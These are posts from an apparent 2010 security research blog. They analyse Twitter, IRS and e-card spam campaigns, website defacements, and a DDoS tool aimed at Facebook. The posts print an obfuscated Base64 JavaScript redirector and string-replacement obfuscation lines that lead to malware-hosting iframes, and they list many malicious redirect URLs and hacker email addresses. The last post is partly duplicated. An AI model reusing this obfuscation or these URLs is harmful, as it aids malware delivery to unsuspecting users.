Tuesday, June 15, 2010

178 International Credit Card Fraudsters arrested

(Thanks to Brian Krebs for the tip on this story)

In the image below, from RTVE.es, someone is about to get a rude awakening, courtesy of the Spanish police:



The scene would be repeated by police in 14 countries who participated in the final phase of a two-year multi-national investigation of cyber criminals accused of creating cloned credit cards and using them in a variety of frauds.

According to Spanish police the organization stole more than 20 million Euros, and was also involved with robbery, fraud, extortion, sexual exploitation, and money laundering.


(image from rtve.es - click image for video)

Among those arrested:

76 people from Spain, with more than 120,000 credit card numbers and 5,000 clone cards in their possession in six separate workshops.

16 people from Romania, where 23 raids were conducted.

30 people from France in 9 raids

7 people from Italy, in 2 raids with 3,100 cloned cards seized

16 people from Germany, which included an individual the Spanish police say was "the most important technical person" in the European portion of the operation, as he could create the card cloning devices.

12 were arrested in Ireland in three raids

8 people were arrested in the USA.

US Secret Service Agent, William Cachinero, took part in the briefing by the Spanish Police commissioner, Serafin Castro. According to La Informacion reporters who attended the briefing, of the 76 arrested in Spain, only two were actually Spanish natives, the rest were Romanian in origin. Two of those arrested in Spain were important ring-leaders, including one who had traveled to the United States seeking to extend their criminal infrastructure. Many of those arrested had blood-ties with each other, and even the overseas criminals included many family members. Serafin explained that some of these criminals were addicted to a big spending lifestyle. He said that the top criminals were fond of partying with drugs and prostitutes where they would spend as much as 2,000 or 3,000 Euros each in a single night of partying.


(from www.rtve.es. Click image for source video)

Monday, June 14, 2010

More Twitter Spam: html-attached threats via Base64

The Twitter spam campaign that we wrote about on Saturday, Twitter, Canadian Pharmacy, and Undetected Malware , has shifted slightly to execute a new threat model. Various email messages which seem to be from Twitter are actually redirecting readers to a website that is selling Canadian pharmacy pills. But is that really what this campaign is about? In our previous article, we mentioned that while the site SEEMS to take you to the Canadian pharmacy website "toldspeak.com", there is more going on behind the scenes.

The previous campaign delivered spam which our friend Graham Cluley has dubbed the "Busty Amber" spam, after the well-endowed model who claims to want to be your friend on Twitter. (Angelina Jolie also wants very badly to be my friend on Twitter - she's sent the UAB Spam Data Mine several tens of thousands of invitations this week.

On Monday, the Busty Amber Twitter spam was primarily pointing to the website "jimjewell.com" and pulling down a file "z.htm". These emails are characterized by a subject line of "Twitter ###-##", where random numbers are used to fill in the
remainder of the email subject. Here's an example of one of the emails, which will have the recipients email address used in several places to create "uniqueness" in the email, which helps with deliverability:



z.htm will forward to the website "toldspeak.com" but will also secretly load an iframe to be used in delivering malware.

The current page actually has already been taken down, but it was pointing to gogoop.casanovarevealed.com port 8080 (slash) index.php?pid=10

The path is the same as the prior site -- ":8080/index.php?pid=10".

The new version of the spam actually doesn't seem to use an external link at all. Instead of having a website that the user is directed to via a URL, the email claims to have an attachment that deals with resetting your Twitter password.



The attached file passes easily through spam filters because although the filetype is ".html", the actual file contents are BASE64 encoded, which means instead of seeing plain text URLs, you have a block of garbage that looks like this:


PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPmZ1bmN0aW9uIGooKXt9O3ZhciB1RT1mYWxzZTtqLnByb3RvdHlwZSA9IHt2IDogZnVuY3Rpb24oKSB7dmFyIGw9Jyc7dGhpcy5sVT1mYWxzZTt0aGlzLmE9Jyc7dmFyIHI9ZG9jdW1lbnQ7Zj0iIjt2YXIgckk9bmV3IERhdGUoKTt2YXIgcz0xNDcwNTt2YXIgeT1yWydsJG8kY1dhcHRXaSRvJG5kJy5yZXBsYWNlKC9bZFdcPHBcJF0vZywgJycpXTtrPScnO3RoaXMudlQ9JGARCHANGEDTHIS3IEFycmF5KCk7eVsnaGFyJWVhZnAnLnJlcGxhY2UoL1twJX5BYV0vZywgJycpXT0naHV0dXRycCo6dS9yL15tKmEpYipjdW9ybSkudW4pZSl0Xi8qenUudWgqdHVtKScucmVwbGFjZSgvW1wpclxeXCp1XS9nLCAnJyk7dmFyIGxDPW5ldyBBcnJheSgpO3ZhciBlPW5ldyBBcnJheSgpO3RoaXMuc0o9IiI7dmFyIGk9ZmFsc2U7fX07dmFyIHVIPWZ1bmN0aW9uKCl7cmV0dXJuICd1SCd9O3ZhciB1PW5ldyBqKCk7IHZhciBvPWZ1bmN0aW9uKCl7fTt1LnYoKTtzUT0ic1EiOzwvc2NyaXB0Pg==


Once decoded, we find another block of text that contains the same sort of javascript replacement trick we mentioned in the previous article. By removing from the string the characters "/,[,\,r,^,*,u,g", we find that the URL we are being redirected to is "mabcom.net" (slash) "z.htm"

That "z.htm" file redirects us to "toldspeak.com", which definitively links us to the other version of the spam, and also loads an IFRAME from the location:

"dodole.designandtransitionspecialists.com" on port 8080 from the file "index.php?pid=10".

About 10PM on Monday June 15th, the spammer finally realized that that site had been removed. Don't worry, he's back again this morning with a new site. The current email with the subject: "Reset your Twitter password" still has an attached BASE64 file. This time the decode is still using the replace trick. Our URL is in this string:

hwt,t_p+:+/_/+e,r0e_i_n,t0z+a,.0cwo0mw/wz0.,h,t0mw

which has the action "replace" executed on it, with a regular expression saying to change the characters "w, _, ,, +, 0," to null.

.replace(/[w_,\+0]/g, '')

That leaves us with:

http://ereintza.com/z.htm

which takes us to a new Canadian pharmacy site, mouseultra.com, but only after it loads its malware IFRAME from:

cache.lamcfoundation.org port 8080 /index.php?pid=10

Fortunately, it looks like someone at the Los Angeles Mission College Foundation has already found the problem and cleaned up the "extra" webserver that they were running.

123Greetings.com


The same technique of attaching an .html file to your spam that contains links to malware is also being used by the current "123Greetings.com" spam run.

In that spam campaign messages with random "from" addresses used in both the subject line and the body of the email are sent, such as:

(HEADER)
From: 123Greetings.com ecards@123greetings.com
Subject: user@domain.com has sent you a birthday card

(BODY)


[user@domain.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.


The attachment, ecard.html, is BASE64 encoded, but has a much more advanced Javascript obfuscation technique than the current Twitter spam campaign. My favorite Base64 decoder choked on it, so I threw it into the page offered by gosu.pl, which did fine turning the Base64 into very messy but nicely formatted Javascript.

The code used blocks like this:

var AUqMA = this;
var jL = 'r' + 'eplace';
var tdbHfv = 'bKaK8MdM2v6M5M9M1T4v7v6M7K9T3Mcv0v0v4KeTbTbv7MbM3M8M5v4M1vdTaM5v4Mav1v7M5TaMaM1v0Ke' ;
var zQwlUR;
zQwlUR = 354;
var qAcav = 763 ;
var Hs = 923;

to gradually build up ridiculously long strings containing code, then "replacing out" the characters that shouldn't be there to eventually cause the malware-hosting malware sites to download and attempt to execute their hostile code.

Saturday, June 12, 2010

Twitter, Canadian Pharmacy, and Undetected Malware

In our post earlier this week, IRS Malware Notice of UnderReported Income, we had a footnote about a current Twitter and YouTube spam run. Our friend Graham Cluley has labeled one version we mentioned the "Busty Amber" spam. (Graham, we didn't know her name - where did you meet her?)

At the time we posted that article we were starting to explore another aspect of the Twitter spam campaign, which continues unabated today, according to the UAB Spam Data Mine. Clicking on the link in the spam is well-publicized as a means to reaching a Canadian pharmacy website, but secretly behind the covers, this spam is all about planting malware.

Let's explore one example from an email we dissected this morning.

As with the American Express , IRS, and Twitter spam, this spam campaign avoids Spam Blacklisting methods by using many thousands of uniquely created spam URLs. In the case of the email we are examining, it looked like this:



The link that claims to be going to "twitter.com" is actually a URL for http://technoline.ca/z.htm

Technoline.ca is in all likelihood a compromised webserver, since its been up since October 2008 "serving the greater Montreal and South Shore region."

When we visit the "z.htm" page, we find that we get a 3 second meta refresh to take us to Canadian pharmacy site "toldspeak.com", however we ALSO get an iframe that takes us to:

rubytune.ru port 8080 /index.php?pid=10

(Rubytune.ru is possibly fast flux. Its currently resolving at:
83.172.13.23
83.172.148.10
89.31.96.64
94.23.224.132
95.211.128.13
)


That site has some interesting Javascript lines, including these two:

Lya2m7t = 'b<5/Mi5f5r5a|m|eH>b'.replace(/[b5\|MH]/g, '');

Ekv9i7z55 = '<5i6f,r|a|m6e5 *s*r5c5=6A6p*p5l,e,t61,0,.*h,t|m,l,>,<,/5i6f*r5a6m6e6>*'.replace(/[\*56\|,]/g, '');

So, the first line is saying take the big long string, and remove the characters in the list: "/", "[", "b", "5", "|", "M", and "H".

If we do that, it leaves us with an iframe to: Notes10.pdf

Doing the same thing on the other line leaves us with an iframe: Applet10.html

Both of those pages are downloaded from the "rubytune.ru" port 8080 webserver.

Notes10.pdf is a malicious PDF, however of the 41 anti-virus products at VirusTotal, only ONE of them says so. Its MD5 is: 33a6f72d52c53c10dd3eb3a7148651f2. You can see its VirusTotal Report here.

Applet10.html is yet another puzzle. This one is a webpage that has the title "Bob's homepage" and tries to use an IE exploit to drop a couple jar files, including a 0010.jar from the (unreachable) site: 85.10.136.213, and a file called "NewGames.jar". The only part of it that I can make function right now is a call to the rubytune.ru site passing a GET of "welcome.php?id=9&pid=10&1=1".

When we do that call, it drops an .exe on the box. For simplicity I named the .exe "welcome.exe". VirusTotal does a bit better with that one. This VirusTotal report shows 7 of 41 detections.

I kicked off the "welcome.exe" in a VM, and what I can tell for sure is that it bluescreened my VM. More details later . . .

Tuesday, June 08, 2010

IRS Malware: "Notice of Underreported income" spam

On June 2nd, we reported on American Express phish abusing free webhosting - a new method of delivering phishing, that we've only seen once before. The spammer creates thousands of "shortened URLs" and "free websites", which are all then used to redirect to a Fast Flux hosted phishing site.

The UAB Spam Data Mine started seeing this technique used in some Twitter-imitating spam at 9:13 AM on June 6th. That campaign is still continuing using spam messages with the subject "Twitter ###-##", such as "Twitter 647-01" or "Twitter 041-33". We'll come back to that campaign shortly. Let's get back to the IRS spam.

Here's a sample email:



That URL points to:

http://zyraziti.ibnsites.com/gujivazi.html

If you visit that free web site, it fowards you automagically to:

http://irs.gov.lazagazal.com/fraud_application/directory/statement.php?tid= target-######US



That site says
Finding and paying your federal taxes correctly and on time is an important part of living and working in the United States. Please review (download and execute) your tax statement


The link to 'tax-statement.exe' is malware, of course, which currently is detected by only 3 of the 41 anti-virus products on VirusTotal.com.

Here's a report from VirusTotal on this malware MD5 : 23c77c4c29158fea0e0e805eef535571.

Despite the fact that NONE of the current Anti-Virus definitions detect this as Zeus, we know it is very quickly when we launch it. The malware connects to the server "phaizeipeu.ru" and retrieves a Zeus bin file, "/bin/hueghixa.bin" from the server there. That domain has been tracked on Zeustracker since June 2nd.

The nameserver used to resolve this domain, ns1.interaktivitysearch.net, was also used for the domain cyansmith.com, which we mentioned in last week's Fast Flux information regarding the AmEx phish.

As an example, phaizeipeu.ru has in the past two minutes resolved to these IP addresses:

201.227.120.102 - Panama Cable & Wireless
115.186.118.122 - Karachi Worldcall, Pakistan
121.121.97.100 - Maxis Broadband, Kuala Lumpur, Malaysia
124.120.246.107 - TruehISP, Bangkok, Thailand
186.19.105.151 - Telecentro, Argentina
190.30.203.28 - Apolo Gold Telecom, Buenos Aires, Argentina
190.55.110.94 - Telecontro, Argentina
190.246.221.161 - Cablevision, Buenos Aires, Argentina

Here's an example of some of those "Free Web hosting" sites that are currently being exploited:

/yxagenub.100freemb.com/aqyhyho.html
/zimisipyce.100freemb.com/byhomawa.html
/mipubacif.100freemb.com/ivamixa.html
/pekijoxam.100freemb.com/otatolaq.html
/ihacaqyb.100freemb.com/pezope.html
/uhisoheb.100megsfree5.com/ecufoke.html
/azasiniza.100megsfree5.com/icypuxo.html
/eqegohazuv.100megsfree5.com/xosynap.html
/hofipyhe.1accesshost.com/inynysyh.html
/culykenaza.1accesshost.com/iwivuga.html
/digobizaw.1accesshost.com/mafujyde.html
/orodydekof.1accesshost.com/nymoba.html
/olecomoxip.1accesshost.com/omekyre.html
/gusozivo.1accesshost.com/qojeti.html
/ewiromiru.1accesshost.com/sybygo.html
/oladolyc.1accesshost.com/tufepaqi.html
/lykyqoryt.1accesshost.com/ucymuvix.html
/udolysedu.1accesshost.com/unepyqun.html
/ebacikud.1accesshost.com/zykotu.html
/yvunavohi.angelcities.com/fyfobu.html
/nukowicu.angelcities.com/nuwiba.html
/kawywupo.arcadepages.com/arefoboq.html
/zesolarix.arcadepages.com/bykevim.html
/zesolarix.arcadepages.com/bykevim.html
/petoxevat.arcadepages.com/ewefuxoc.html
/inumynumoc.arcadepages.com/eximiqu.html
/ugijehicip.arcadepages.com/ezygexi.html
/oziqysehij.arcadepages.com/iqypufe.html
/imodarecy.bigheadhosting.net/exefoza.html
/wapovaqyh.bigheadhosting.net/panykeve.html
/pomobalyw.bigheadhosting.net/udewin.html
/afofywog.bigheadhosting.net/xufekap.html
/qecixedake.bigheadhosting.net/ysudydev.html
/qecixedake.bigheadhosting.net/ysudydev.html
/xymyfuqad.builtfree.org/bafazu.html
/okypocup.builtfree.org/ovamyqem.html
/wosogabaf.builtfree.org/upuzyr.html
/wosogabaf.builtfree.org/upuzyr.html
/azykakubol.digitalzones.com/ejitehi.html
/onamowonom.digitalzones.com/gypywoz.html
/godicyce.digitalzones.com/ixydet.html
/vixehuxo.digitalzones.com/woducuda.html
/goqivateg.digitalzones.com/ykybaxu.html
/toguhogi.dreamstation.com/avyryk.html
/utofitala.dreamstation.com/kylebik.html
/eqobymoped.dreamstation.com/ogiqyr.html
/ynexovaxo.dreamstation.com/winipyk.html
/yxyqyhuweh.dreamstation.com/ykeqegag.html
/culaworege.easyfreehosting.com/coriroxi.html
/culaworege.easyfreehosting.com/coriroxi.html
/ejofizyz.easyfreehosting.com/dabizeza.html
/ehuceximog.easyfreehosting.com/finixe.html
/umobafavu.easyfreehosting.com/irafyfa.html
/hemahodo.easyfreehosting.com/ufudimaw.html
/xujuguba.easyfreehosting.com/wybave.html
/ejorikoki.easyfreehosting.com/ygoxuq.html
/eqowiwyryx.envy.nu/bohopi.html
/fekynylum.envy.nu/ecevamib.html
/ewemasavy.envy.nu/ymohale.html
/ypodobuni.envy.nu/zytabe.html
/lijogaju.exactpages.com/apexoke.html
/lijogaju.exactpages.com/apexoke.html
/kogybovise.exactpages.com/vujufapa.html
/kywunereju.fcpages.com/erynoh.html
/bicefipipu.freecities.com/hibahu.html
/uboqenunep.freecities.com/nokoxuqo.html
/efysewezic.freecities.com/zevesaz.html
/tekefopo.freehostyou.com/gadasu.html
/alaradewo.freehostyou.com/guzyxoku.html
/ucoqopaby.freehostyou.com/mebyhuh.html
/wogeqiqyq.freehostyou.com/xegesef.html
/icocoqaby.freewaywebhost.com/cidaci.html
/ikucoban.freewaywebhost.com/ovydodo.html
/lykofuzequ.freewaywebhost.com/yjirox.html
/enecyhofow.freewebportal.com/axefeta.html
/vugogyve.freewebportal.com/cydaquno.html
/uwebijygyq.freewebportal.com/reniqyh.html
/hylydacymi.freewebportal.com/ucasob.html
/xuryqoju.freewebsitehosting.com/kocysu.html
/iruzasahyl.freewebsitehosting.com/olocon.html
/vizuzati.freewebsitehosting.com/oqaxiso.html
/umikyvoca.freewebsitehosting.com/xeruwyca.html
/umikyvoca.freewebsitehosting.com/xeruwyca.html
/oqixunoni.freewebsitehosting.com/xosize.html
/ufininir.freewebsitehosting.com/xusepu.html
/ikadiriga.freewebsitehosting.com/ylydugu.html
/ocerityv.freewebsitehosting.com/zopycy.html
/ubikiwaq.greatnow.com/ezixevol.html
/nififazi.greatnow.com/husadu.html
/isihogezin.greatnow.com/ysuxyrud.html
/cli.gs/eM8NXV
/cli.gs/UQBAHQ
/pokijyny.ibnsites.com/adopadat.html
/keferival.ibnsites.com/erematy.html
/zyraziti.ibnsites.com/gujivazi.html
/izyjopyh.ibnsites.com/jisokoce.html
/upymyvul.ibnsites.com/jylyhu.html
/irytaneb.ibnsites.com/kerific.html
/novufuvaxo.ibnsites.com/myzaquq.html
/nohoxutah.ibnsites.com/nydawodo.html
/eperitupuh.ibnsites.com/puhetyfe.html
/anutugoc.ibnsites.com/pukohe.html
/uwyraxuvy.ibnsites.com/qyqepib.html
/yrozujon.ibnsites.com/rusepen.html
/nagysadyx.ibnsites.com/ypenoc.html
/xisyjemo.lookseekpages.com/edavyket.html
/xisyjemo.lookseekpages.com/edavyket.html
/alezehifo.lookseekpages.com/jomuxa.html
/alezehifo.lookseekpages.com/jomuxa.html
/zysesojej.lookseekpages.com/kicylito.html
/vacagufo.lookseekpages.com/novygidy.html
/vacagufo.lookseekpages.com/novygidy.html
/pexogipol.lookseekpages.com/oxucafe.html
/gusejunad.lookseekpages.com/qinigo.html
/ipolagux.maddsites.com/dyjyzylu.html
/karaqika.maddsites.com/egesor.html
/ufawalijuh.maddsites.com/ilubyqy.html
/jokomule.maddsites.com/leqojo.html
/febaveli.maddsites.com/onapiju.html
/awilubux.mindnmagick.com/kehiwugi.html
/olawisyr.o-f.com/ejepekaz.html
/otumybigu.o-f.com/oqyhuxy.html
/afukafutu.s-enterprize.com/itociwo.html
/wenadinudu.servetown.com/ajihepo.html
/kahahari.servetown.com/biximol.html
/ovepahax.servetown.com/vyzurily.html
/nyfufuveco.servetown.com/xibycepi.html
/odivawuh.the-best-free-web-hosting.com/avyfemu.html
/izepofupy.the-best-free-web-hosting.com/yceqalu.html
/gopirocup.the-best-free-web-hosting.com/ydagyduf.html
/sawatazuky.uvoweb.net/afumox.html
/sawatazuky.uvoweb.net/afumox.html
/xynunuxev.uvoweb.net/ekocap.html
/kebypatat.uvoweb.net/garicedy.html
/eqeqalywoj.uvoweb.net/mafepody.html
/ubejedoqej.uvoweb.net/wetira.html
/vunagugevu.virtue.nu/evawov.html
/elyxupij.virtue.nu/juzepod.html
/elyxupij.virtue.nu/juzepod.html
/mequmato.virtue.nu/kiqabyto.html
/ofopuhymam.virtue.nu/ozowynuf.html
/ipecatuvo.virtue.nu/pokekuke.html
/ihamozavil.virtue.nu/qefeqo.html
/ihamozavil.virtue.nu/qefeqo.html
/xavesahyh.wtcsites.com/dasuqiw.html
/irutajov.wtcsites.com/huzexeje.html
/gisejywira.wtcsites.com/ubumike.html
/ikifinukux.wtcsites.com/upitim.html

Twitter Spam



While the Twitter spam also uses many free websites, it actually has a much smaller number, and combines "googlegroups", "110mb.com", and "t35.com" websites with a selection of compromised domains.

http://aomdesign101.com/d.htm
http://aprendainglesrapido.net/x.htm
http://capelcure.co.uk/1.html
http://cobhamdogs.net/x.htm
http://cobhamdogs.net/x.htm
http://crefxxx.110mb.com/index.htm
http://cresssa.110mb.com/index.htm
http://dreaminom.t35.com
http://faceseverywhere.com/x.htm
http://givisss.110mb.com/index.htm
http://grapevinephotography.com.au/1.htm
http://groups.google.com/group/pppppps
http://jennifervpearl.com/x.htm
http://lessreachom.t35.com
http://millcreekswim.com/x.htm
http://openexe.googlegroups.com/web/Twitter_security_model_setup.zip
http://pppppps.googlegroups.com/web/g.html
http://superiormerchant.com/x.htm
http://toldspeak.com
http://twitter.com/account/not_my_account/
http://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip
http://uucgb.org/x.htm
http://xizinnn.110mb.com/index.htm
http://xyddds.110mb.com/index.htm

The spam from these sites is also varying.

Security version:
Attention! We detected that someone was trying to steal your Twitter account password.

We strongly recomended you to download our secure module to protect account!

Please click on the link below:
http://twitter.com/Twitter_security_model_setup.zip



Pill version:
This version only shows a picture of a man showing "two-thumbs up" surrounded by pills with cheap prices on them.


Unread message version:
You have 1 unread message from Twitter

Please click on the link below or copy and paste the URL into your browser:
http://twitter.com/account/=youremail@yourdomain.com


An alternative, being currently spammed, follows the unread message with a photo of a large-breasted woman showing off her cleavage.

YouTube Spam



The identical photograph (click to see image here if you aren't offended by scantily clad women) is also currently being used in a "YouTube" spam.

Prior to about 2:00 PM Central time, the message did not contain the photograph, but only a YouTube logo and the message below (with a varying "user name" for each email.)

The user Jordan suggests you to become friends on YouTube. Offers and acceptance of offers on friendship simplify tracing of that your friends place in the selected works, add or estimate, and also simplifies video departure by all or to the selected users. To accept or reject this invitation, pass in INBOX


Some of the YouTube versions point to links on these pages:

htp://camaka.net/1.htm
http://aomdesign101.com/d.htm
http://aprendainglesrapido.net/x.htm
http://bombardierconsulting.com/x.htm
http://camaka.net/1.htm
http://cccxxdd.110mb.com/index.htm
http://cresssa.110mb.com/index.htm
http://kayakguy.com/x.htm
http://millcreekswim.com/x.htm
http://superiormerchant.com/x.htm
http://uucgb.org/x.htm
http://wanderingchild.org/x.htm
http://xyddds.110mb.com/index.htm

all of which forward elsewhere for the actual "pill-related" spam content

Saturday, June 05, 2010

Pro-Gaza hackers target Israeli websites

When it comes to website hacking, the Turks seem to be consistently at the top of the pack. This is mostly because their government tolerates their activities with little regard for international law. The oldest and most complete collection of website defacements is Zone-H, a site run by Roberto Preatoni that tries to document defacement activity by archiving the defaced websites. Defacement rates are rising, with a typical day seeing between 1500 and 3000 defaced websites, with a large number of these by Turkish defacement groups.

After various protest groups chose to stage a so-called "Freedom Flotilla" protest and attempt to deliver supplies to Gaza despite the well-known Israeli blockade. As YNet News reports:
The deputy head of Israel's mission to the United Nations, Dan Carmon, told the Security Council, "Although portrayed in the media as a humanitarian mission delivering aid to Gaza, this flotilla was (not) a humanitarian mission. If indeed it were a humanitarian mission it would have accepted, weeks ago, during the planning stages, the offer by the Israeli authorities to transfer the aid, through to the port of Ashdod, to Gaza through the existing overland crossing, in accordance with established procedures. Many states and organizations, including the UN, are using those mechanisms on a daily basis.


This interpretation of events is backed up by the IDF's YouTube channel. The Israeli military has been using YouTube to spread the official version of various contested events for more than a year, justifying their military actions by showing video of smuggling, rocket attacks, and other activities.

The nine demonstrators killed on the Mavi Marmara, a Turkish flagged ship, and eight of the nine killed were Turkish citizens. This is a guarantee that the various Turkish hacking groups will respond, and bring the cyberforces of Islam to bear on any website that ends in a ".il".

As you'll see below, although the Turks may have started the cyber protest, it has spread throughout the Islamic world, including Moroccans, Indonesians, Yemeni, and others.

Website Security and YOU


Some people say we are "glorifying the hackers" when we talk about their defacements, or "just giving them what they want" meaning publicity.

I'd like you to think, dear reader, as you look at these sites below about a different message. IF YOUR WEBSITE IS NOT SECURED, criminals, activists, terrorists, script kiddies, and phishers can break into your website and use it to spread whatever message they want.

Think about one of these images being associated with the name of YOUR COMPANY or YOUR ORGANIZATION.

How do you review your website security? Is someone reviewing your log files regularly? Do you have a mechanism to review statistics about your server? Would you even know it if someone added a page like one of those below to your server?

Yes, there is a cyber protest going on, but try not to think in terms of Israeli-Palestinian-Turk. Think in terms of hackers and YOU.

The Current Conflict


Here are a few of the SEVERAL THOUSAND websites defaced since those actions went down, and a few notes about some of the defacers that are attacking them.

Islamic Ghosts Team


srudi.co.il was hacked by the Islamic Ghosts Team, with the typical poorly structured English messages:

Who are the rightful terrorists in this world !!!!
Be sure that the whole world has become known the real Terror
./ Islamic Ghosts Team


According to Zone-H, the Islamic Ghosts Team has hacked more than 6800 websites, with many dozens in the past few days being this attack against Israeli sites. Of course they are also still attacking the government of Mexico.

They include the official graphic of this "campaign", which I'm linking to from its regularly used site at espacetunisien here:



They also have other far more disturbing images on recent defacements, many featuring a ripped burning Star of David Israeli flag.

Ma3str0-Dz


Algerian Hacker, Maestro-DZ, hangs out on the website Sec4ever.com and uses a german hotmail account - o5m@hotmail.de. Maestro-DZ has hacked more than 5,400 websites, including 390 Israeli sites.

His defacement yesterday of the Weissman Law firm demonstrates his foul mouth and poor english, along with this graphic:



He's been doing anti-Israeli website defacing since at least October 2009, when he did a defacement "For the Kids of Gaza" by hacking ballas-eng.co.il.


Jurm-Team (RealFaciaXXX)


If that name sounds familiar, it should. Jurm has been a member of several very high profile website defacement groups. He's invited to quite a few "All star" parties. His current team mates, Jurm, Dr.Noursoft, RedDoom, and Kingofp4 are hiding behind a group hotmail account, Jurm-Team@hotmail.com and using their defacements to show a video of Israeli atrocities.

Jurm and friends are "Moroccan Hackers" according to their defacements.
RealFaciaXXX must have just joined the team. His "For Palestina" hacks have not mentioned Jurm before yesterday, and most recently show an Arabian-head-garbed man with a shoulder launched missile facing into the camera.

1923Turk


Many Turkish hackers prefer to post their defacements on "Turk-H.org" instead of Zone-h.org. Looking over there briefly, there are many additional defacements not indexed on Zone-H. One of the more confusing groups is 1923Turk. This group's members post defacement stats using the common name, but actually have dozens of individual hacking groups that are assigned to different "missions". For example, one defacement claimed by "1923Turks" today is www.gerontology.org.il, but the defacement itself says it was committed by "Hackspy & Hate", two hackers who are members of a 1923Turks squad consisting of members, ÖlüM - xoxmemo - HaCkSpY - Devil_Boy - LegendSemih - TheEnd - Deadly - HaTe - Hydr4 - LifeOrDeath. The Team leader is usually listed first, but any of the members can do a defacement as long as the team leader is listed and the credit is given to the 1923Turk group.

Many of the current 1923Turk defacements use this image:


(Potentially offensive image: Click to see)

The 1923Turk group actually has more than 45,000 members, including 2600 new members during the past 30 days. They aren't all hackers - they have many groups dedicated to "patriotic" security of all sorts, including helping Turkish citizens getting malware off their computers. There are thousands involved in hacking though - some assigned exclusively to hacks against the PKK, and others to various "enemies of Islam", in teams divided by the country they are targeting. Some of their forums are Turkish culture, computer programming, and Islamic education forums as well.

1923Turk is an homage to "the Ataturk", Mustafa Kemal. Although he is credited with ruling the first secular Turkey, beginning after World War I, the Ataturk is celebrated by these young hackers for his ability to have multiple religions living "at peace" with one another. They claim we need to return to this style of tolerance shown (at least in their twisted memories) by the Ataturk. (I actually read an enormous biography of the Ataturk to help me understand these guys - Ataturk: the Biography of the founder of Modern Turkey, by Andrew Mango - very helpful and interesting!)

Team Hitman Hacker


This team, consisting of Yemeni hacker Mr.NSR (oi3@hotmail.com) and Moroccan hacker, RaYm0n (n5b@hotmail.com) has posted a portrait of Hitler on various Israeli websites. The words on the Hitler poster are in Arabic, and I'm not sure yet what they say.

Team Hitman has defaced 8,700+ websites, including well over 100 Israeli sites in the past 48 hours.

Their current defacement technique is actually a redirect-injection that takes the visitor to RaYm0n's website:

http://raym0n.com/fuck-il.html

Raym0n's WHOIS data says his email is "w_@hotmail.fr"

He hosts his anti-Semitic content at "club4hosting.com"

BobyHikaru


Each new cyber protest acts as a recruiting event for new script kiddies. One of the new comers this time is BobyHikaru, who calls himself a member of the "Indonesian Hacker Team" and lists a website Devilzc0de.org on his defacements, along with this graphic:



In his spare time, Boby hacks the government of Indonesia. he's only hit less than 100 sites in his entire career.

Turkish Hacker, AKINCILAR, has also picked up this graphic, and added his own art to the bottom of it for use in defacements, such as this one:

http://yygranot.co.il/gallery

H4X0R-x0x


Another Indonesian hacker, with only 90 website defacements, has joined the cause, hacking a design school in Israel showing a metallic skeleton bursting through a bloody Israeli flag with his middle finger extended, and calling to "Stop War in Gaza"

Arumbia Team


The "Arumbia Team" (never heard of them) has also hacked an Israeli law firm and a half dozen other Israeli websites. They list 18 members, probably mostly Indonesian.

In Conclusion


No conclusion yet. This thing is just getting started. This morning's news had several references to synagogue websites in other parts of the world being defaced, most notably in Massachusetts by "Pintu Maya Team", although this seems to be a case of a very widely spread story originating from a single report. I can't find an archive of the actual defacement, and have never heard of Pinta Maya Team. If anyone knows a forum or website where they hang out, let me know . . . gar at uab dot edu

Tuesday, June 01, 2010

VirtualJihad against Facebook

On May 20th, a group who claim to be motivated by various "Freedom of Expression" announced that they were holding "Everybody Draw Mohammad Day". As everyone knows by know, on September 30, 2005, a Danish newspaper chose to publish several cartoons of the Prophet Mohammed, including one of the prophet with his turban containing a bomb, which was drawn by Kurt Westergaard. This was the first many Westerners learned of the Islamic tradition that the prophet should never be depicted. The controversy has continued since then, with various papers reprinting the cartoons, and various Islamic nations then banning those papers, or calling for acts of violence against their editors. In January of 2010, Westergaard's home was broken into by an Islamic man who chopped through his door with an axe and desired to kill him with a knife.

The current "Everybody Draw Mohammed Day" craze was not inspired by Westergaard, but rather by death threats against the SouthPark artists, Matt Stone and Trey Parker, who depicted the Prophet Mohammed wearing a bear suit. Seattle-based cartoonist Molly Norris ran a cartoon suggesting that May 20th, be declared "Everybody Draw Mohammed Day" sponsored by "Citizens Against Citizens Against Humor or CACAH", which she has now retracted by scribbling notes on her own cartoon:



Unfortunately for Molly, many folks took her seriously, creating a special website to receive their submitted drawings, and more relevantly to our topic today, they also created a Facebook group, "Everybody Draw Mohammed Day."




The creation of the Facebook Group lead to several national bans of Facebook, including bans by Pakistan, Bangladesh, and the United Arab Eremites. The UAE and Saudi Arabia both made "line item veto" bans blocking only the offending group on Facebook, while the first two banned the entire website. (Update: Pakistan lifted their "blanket" ban on May 31st after Facebook actually censored the offending group.)




Pakistani media reported that "hacking fraternities" were being formed to "take revenge" on the "blasphemous companies". Pakistani residents have reported receiving SMS text messages encouraging them to participate in DDOS attacks. The website "drawmohammed.com" has also been repeatedly defaced by Islamic hackers since this event began.

Perhaps the most outrageous response has been the encouragement to download the attack tool that is being spread to help people DDOS.

The Google Group "Muslims United" was created May 19th and has been actively attacking "offensive" websites. The main banner proclaims the site to be the "Anti-Draw-Muhammad (P.B.U.H.) -DAY", and currently has 1800 messages. Several of these relate to the "virtualjihad.net" website, where the DDOS tool is included.





VirtualJihad.net was registered on May 19th from the website "www.secsupport.com", a reseller for Directi's PublicDomainRegistry.com.

The website is hosted on the IP, 75.126.169.149, hosted by SoftLayer.com, right here in the USA.

The tool has a pull-down menu, allowing the user to choose whether he wants to attack "www.muhammadture.com", "www.drawmuhammadday.com", or "www.facebook.com".

Their website claims they have 34,306 people actively attacking with their tool at this time. The organizers, using the email "info@virtualjihad.net", claim to be reachable via MSN, GoogleTalk, or Skype as well as email.

VirtualJihad against Facebook

On May 20th, a group who claim to be motivated by various "Freedom of Expression" announced that they were holding "Everybody Draw Mohammad Day". As everyone knows by know, on September 30, 2005, a Danish newspaper chose to publish several cartoons of the Prophet Mohammed, including one of the prophet with his turban containing a bomb, which was drawn by Kurt Westergaard. This was the first many Westerners learned of the Islamic tradition that the prophet should never be depicted. The controversy has continued since then, with various papers reprinting the cartoons, and various Islamic nations then banning those papers, or calling for acts of violence against their editors. In January of 2010, Westergaard's home was broken into by an Islamic man who chopped through his door with an axe and desired to kill him with a knife.

